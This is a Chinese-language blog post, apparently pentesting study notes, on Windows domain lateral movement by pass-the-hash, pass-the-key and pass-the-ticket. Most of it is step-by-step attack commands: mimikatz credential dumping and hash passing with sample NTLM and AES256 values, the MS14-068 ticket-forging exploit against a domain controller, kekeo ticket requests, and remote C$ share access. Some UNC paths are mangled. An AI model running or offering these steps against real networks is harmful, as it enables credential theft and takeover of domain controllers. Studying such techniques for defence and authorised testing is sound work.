这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试就是绕过上篇博客的hash验证
PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试
PTK(pass the key) #利用的 ekeys aes256 进行的渗透测试
PTH 在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过 LM Hash 和 NTLM Hash
访问远程主机或服务,而不用提供明文密码。
如果禁用了 ntlm 认证,PsExec 无法利用获得的 ntlm hash 进行远程连接,但是使用 mimikatz 还是可
以攻击成功。对于 8.1/2012r2,安装补丁 kb2871997 的 Win 7/2008r2/8/2012 等,可以使用 AES keys
代替 NT hash 来实现 ptk 攻击,
总结:KB2871997 补丁后的影响
pth:没打补丁用户都可以连接,打了补丁只能 administrator 连接
ptk:打了补丁以后用户采用 aes256 连接,那么所有用户都可以连接
https://www.freebuf.com/column/220740.html

PTH ntlm 传递

即未打补丁下的工作组及域连接:(mimikatz)
这里是先在跳板机上使用mimikatz获取到NTML密文然后使用下面三个中的一个命令
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

跳板机上会弹出一个命令框,最后net use \192.168.76.137c$ 这样子去连接目标机器,这样跳板机就拿到内网主机的shell了
PTH攻击类似于上一篇文章的hash连接,但是又有所区别。
QQ截图20211106172313.jpg
QQ截图20211106172746.jpg

PTK aes256 传递

打补丁后的工作组及域连接(一定要打补丁!!!才可以连接)所以说这个就是PTH的候补选择
mimikatz下执行:
sekurlsa::ekeys 获取aes 在最末尾的地方可以看到aes256
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

横向移动PTT传递-ms14068

klist查看当前主机上的票据情况
这里的k指的是kerbero
privilege::debug权限提升,在这里提升不了也没关系,足够了
(会报错的)
QQ截图20211107113143.jpg

能实现普通用户直接获取域控 system 权限
MS14-068要在powershell中执行
1.查看当前sid whoami/user

mimikatz下 kerberos::list 查看当前机器凭证
mimikatz下 kerberos::purge 清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

3.利用 ms14-068 生成 TGT 数据
ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 - p admin123456
4.票据注入内存
mimikatz下 kerberos::ptc TGT_mary@god.org.ccache
5.查看凭证列表 klist
6.利用
dir \域控主机名c$ 可以用net time /domain来查看域控主机名

域横向kekeo

1.生成票据
kekeo下 tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c
这里的mary是域控的名字,god.org是域 ntlm是域控的ntml
2.导入票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看凭证 klist
4.利用dir载入
dir \192.168.52.138c$
或者
dir \域控名字c$

第三种利用本地票据(需管理权限)

sekurlsa::tickets /export
然后导出一堆的kirbi,一个个试就行
kerberos::ptt xxxxxxxxxx.xxxx.kirbi
dir \192.168.52.138c$
或者
dir \域控名字c$

国产 Ladon 内网杀器

信息收集-协议扫描-漏洞探针-传递攻击等